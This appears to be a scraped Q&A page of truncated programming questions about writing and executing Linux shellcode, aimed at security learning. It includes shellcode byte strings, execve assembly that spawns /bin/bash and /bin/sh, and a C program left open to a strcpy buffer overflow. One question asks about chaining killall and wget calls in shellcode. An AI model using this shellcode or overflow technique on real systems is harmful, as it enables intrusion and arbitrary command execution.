shellcode

问题 I try to build a function in a buffer in C. with gdb i can translate push rbp mov rbp,rsp (...) leave ret to 0x55 0x48 0x89 0xe5 (...) 0xc9 0xc3 So I wrote a C code: int main() { char buffer[]={0x55,0x48,0x89,0xe5,0xc9,0xc3}; void (*j)(void)=buffer; j(); } but my program seems to crash at the intruction "push rbp" (0x55 in the buffer) Do you know why? 回答1: The usual cause is that the stack (where your buffer is stored) is not executable. There are primarily two ways around that: compile/link

问题 I'm learning the basics of computer security and I'm trying to execute some shellcode I've written. I followed the steps given here http://dl.packetstormsecurity.net/papers/shellcode/own-shellcode.pdf http://webcache.googleusercontent.com/search?q=cache:O3uJcNhsksAJ:dl.packetstormsecurity.net/papers/shellcode/own-shellcode.pdf+own+shellcode&cd=1&hl=nl&ct=clnk&gl=nl $ cat pause.s xor %eax,%eax mov $29,%al int $0x80 $ as -o pause.o pause.s $ ld -o pause pause.o ld: warning: cannot find entry

问题 I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux. Here is my C program #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buffer[500]; if(argc==2) { strcpy(buffer, argv[1]); //vulnerable function } return 0; } This is the shellcode I am using, which corresponds to simple /bin/ls \x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80

问题 I want a simple C method to be able to run hex bytecode on a Linux 64 bit machine. Here's the C program that I have: char code[] = "\x48\x31\xc0"; #include <stdio.h> int main(int argc, char **argv) { int (*func) (); func = (int (*)()) code; (int)(*func)(); printf("%s\n","DONE"); } The code that I am trying to run ( "\x48\x31\xc0" ) I obtained by writting this simple assembly program (it's not supposed to really do anything) .text .globl _start _start: xorq %rax, %rax and then compiling and

问题 I'm writing a program that loads and executes code from file. But i got a problem: "write" syscall does not work. Code successfully loads and executes, but does not display any text on the screen. Program that loads code: #include < stdio.h > #include < stdlib.h > int main(int argc,char* argv[]) { unsigned int f_size = 0; unsigned char* code_buf = NULL; void (*func_call)(void) = NULL; if(argc < 2) { printf("Usage: %s <FILE>\n",argv[0]); return 1; } FILE* fp = fopen(argv[1],"rb"); if(!fp) {

问题 I came across this piece of code: char code[] = "\xb0\x01\x31\xdb\xcd\x80"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); } It is copied from Writing Shellcode for Linux and Windows Tutorial. Could someone explain that what this function invocation (int)(*func)(); is doing? 回答1: It calls a function whose machine code is in the array code . The string contains some machine-level instructions ((three I think, have a look at x86 instruction set). func

问题 I am trying to study execve shellcode, OS : Linux bt 2.6.39.4 root@bt:~/exploit# cat gshell.s .globl _start _start: nop jmp MyString shell: popl %esi xorl %eax,%eax movl %al,9(%esi) movl %esi,10(%esi) movl %eax,14(%esi) movb $11,%al movl %esi, %ebx leal 0xa(%esi),%ecx leal 0xe(%esi),%edx int $0x80 movl $1,%eax movl $0,%ebx int $0x80 MyString: call shell shellvar: .ascii "/bin/bashADDDDCCCC" root@bt:~/exploit# as -gstabs -o gshell.o gshell.s root@bt:~/exploit# ld -o gshell gshell.o root@bt:~

问题 I want to convert Intel x86 assembly code to ARM. I do not know how to use the stack. I wrote a call to execve using an int 0x80 system call for 32-bit x86 Linux. However, ARM uses svc or swi. But I do not know how to use something like this: push 0x0068732f and push 0x6e69622f .globl main main: push 0x0068732f push 0x6e69622f mov edx, 0 mov ecx, 0 mov ebx, esp mov eax, 11 int 0x80 mov ebx, 0 mov eax, 1 int 0x80 The syscall on arm expects to use the swi to look like this: .global _start

问题 I am trying to write shellcode in assembly. I need to perform a /usr/bin/killall command AND a /usr/bin/wget command. I have both commands running perfectly in shellcode with the execve() syscall. But now I want to combine these 2, but this is not possible because the program exits when the first execve() call is executed. (from the man pages of execve() : execve() does not return on success). How can I perform 2 execve() calls? Or is there another way to call both /usr/bin/killall and /usr

问题 When writing buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the shellcode. So that when my input array overflows, it overwrites the saved return address with the address of the shellcode. I think since the shellcode will be stored above the saved return address on the stack, its address should be address_of_return_address + the distance to the beginning of